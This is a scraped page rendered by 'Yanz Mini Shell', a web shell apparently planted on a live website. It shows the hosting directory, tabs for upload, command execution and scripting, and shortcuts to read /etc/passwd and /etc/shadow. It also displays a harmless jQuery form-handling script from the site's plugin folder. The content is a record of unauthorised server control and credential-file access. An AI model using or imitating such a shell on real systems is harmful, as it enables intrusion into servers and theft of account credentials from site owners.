Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
datetimepicker
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
(function($) { "use strict"; $("form.frm-submit").each(function(i, el) { var $this = $(el); $this.on('submit', function(e){ e.preventDefault(); var btn = $this.find('[type="submit"]'); $.ajax({ url: $(this).attr('action'), type: "POST", data: $(this).serialize(), dataType: 'json', beforeSend: function () { btn.button('loading'); }, success: function (data) { $('.error').html(""); if (data.status == "fail") { $.each(data.error, function (index, value) { $this.find("[name='" + index + "']").parents('.form-group').find('.error').html(value); }); btn.button('reset'); } else if (data.status == "access_denied") { window.location.href = base_url + "dashboard"; } else { if (data.url) { window.location.href = data.url; } else{ location.reload(true); } } }, error: function () { btn.button('reset'); } }); }); }); }).apply(this, [jQuery]); // Select2 (function($) { 'use strict'; if ($.isFunction($.fn['select2'])) { $(function() { $('[data-plugin-selectTwo]').each(function() { $(this).select2({ width: "100%" }); }); }); } }).apply(this, [jQuery]); // Loading button plugin (removed from BS4) (function($) { $.fn.button = function(action) { if (action === 'loading' && this.data('loading-text')) { this.data('original-text', this.html()).html(this.data('loading-text')).prop('disabled', true); } if (action === 'reset' && this.data('original-text')) { this.html(this.data('original-text')).prop('disabled', false); } }; }(jQuery));
Free Space : 11288219648 Byte